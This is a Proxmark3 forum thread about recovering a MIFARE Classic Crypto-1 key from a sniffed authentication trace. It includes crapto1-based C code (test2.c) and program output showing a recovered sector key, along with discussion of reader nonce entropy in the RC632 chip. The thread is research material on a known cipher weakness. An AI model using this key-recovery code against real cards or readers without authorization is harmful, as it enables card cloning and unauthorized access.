Research, development and trades concerning the powerful Proxmark3 device.
Remember; sharing is caring. Bring something back to the community.
"Learn the tools of the trade the hard way." +Fravia
Time changes and with it the technology
Proxmark3 @ discord
Users of this forum, please be aware that information stored on this site is not private.
Initialization values
UID: c2 a8 2d f4
KEY: xx xx xx xx xx xx
Mifare Classic trace, []=Encrypted
Auth(30): 60 30 76 4a
Nt: 42 97 c0 a4
[Nr,Nt']: 7d db 9b 83 67 eb 5d 83
[Nt'']: 8b d4 10 08
I want to know what is the secret key and nonce of reader.
anyone can recover it?
Well you can just fill the values in the test2.c code that I posted in this message:
http://www.proxmark.org/forum/viewtopic … d=404#p404
uint32_t uid = 0xc2a82df4;
uint32_t tag_challenge = 0x4297c0a4;
uint32_t nr_enc = 0x7ddb9b83;
uint32_t reader_response = 0x67eb5d83;
uint32_t tag_response = 0x8bd41008;
And the key rolls out:
./test2
nt': 90f14a44
nt'': f367ce41
ks2: f71a17c7
ks3: 78b3de49
Found Key: [d8 48 69 42 ee d3]
I hope this helps, it has now succesfully recovered the MIFARE Classic key from your info.
You are totally right. The reader nonce generated for example by the RC632 chip has an
entropy of >16 bits (maybe even the full 32 bits).
We could not found a simple LFSR structure in the samples we have taken.
Interesting though is that the it iterates by invocations in stead of a looping timer (like the tag-nonces).
This means that when you re-power-up the reader-chip you will get the same sequence of nonces.
Secondly this means that the following quote from the paper Cryptanalysis of Crypto-1 seems incorrect!
Our attack assumes that we can recover the first bit of the key stream.
This bit is combined with a random bit that is generated on the reader.
We have shown previously that the random numbers are known to an attacker
since they are generated deterministically [3]. The attacker needs knowledge of a single key that can,
for example, be found using a brute-force attack on the entire key space. Once one key is known,
an attacker can learn enough about a given reader to predict the random numbers it will generate,
so any number of keys can be recovered using our statistical attack.
The proposed attack in this paper seems not to be as easy feasible as described.
i really don't see why you are interested in Nr but hey...
adjusting roel's demo code
// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
struct Crypto1State *revstate;
uint64_t lfsr;
unsigned char* plfsr = (unsigned char*)&lfsr;
uint32_t uid = 0xc108416a;
uint32_t tag_challenge = 0xabcd1949;
uint32_t nr_enc = 0x59d5920f;
uint32_t reader_response = 0x15b9d553;
uint32_t tag_response = 0xa79a3fee;
uint32_t ks2 = reader_response ^ prng_successor(tag_challenge, 64);
uint32_t ks3 = tag_response ^ prng_successor(tag_challenge, 96);
+uint32_t ks4,ks5, ks1, nr;
printf("nt': %08x\n",prng_successor(tag_challenge, 64));
printf("nt'': %08x\n",prng_successor(tag_challenge, 96));
printf("ks2: %08x\n",ks2);
printf("ks3: %08x\n",ks3);
revstate = lfsr_recovery(ks2, ks3);
+ks4 = crypto1_word(revstate,0,0);
+ks5 = crypto1_word(revstate,0,0);
+lfsr_rollback(revstate, 0, 0);
+lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, nr_enc, 1);
+ks1= crypto1_word(revstate, nr_enc, 1);
+nr = nr_enc ^ ks1;
+lfsr_rollback(revstate, nr, 0);
lfsr_rollback(revstate, uid ^ tag_challenge, 0);
crypto1_get_lfsr(revstate, &lfsr);
printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);
return 0;
}